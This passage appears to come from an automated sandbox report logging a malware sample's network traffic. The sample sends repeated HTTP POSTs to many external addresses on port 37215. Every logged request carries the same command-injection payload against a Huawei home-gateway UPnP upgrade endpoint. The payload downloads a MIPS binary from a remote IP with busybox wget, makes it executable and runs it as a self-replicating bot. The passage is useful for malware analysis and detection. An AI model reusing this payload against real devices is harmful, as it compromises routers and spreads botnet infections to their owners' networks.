                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  697192.168.2.1357482157.22.63.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369915009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  698192.168.2.135771041.246.241.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369930029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  699192.168.2.1343912117.114.59.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369949102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  700192.168.2.1351826157.143.240.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369972944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  701192.168.2.1349530197.101.36.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369983912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  702192.168.2.1334152157.224.174.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.373800993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  703192.168.2.1339630157.36.222.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.373814106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  704192.168.2.1351096197.36.31.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.373862982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  705192.168.2.1335736128.39.150.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.373900890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  706192.168.2.135740441.72.45.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.373969078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 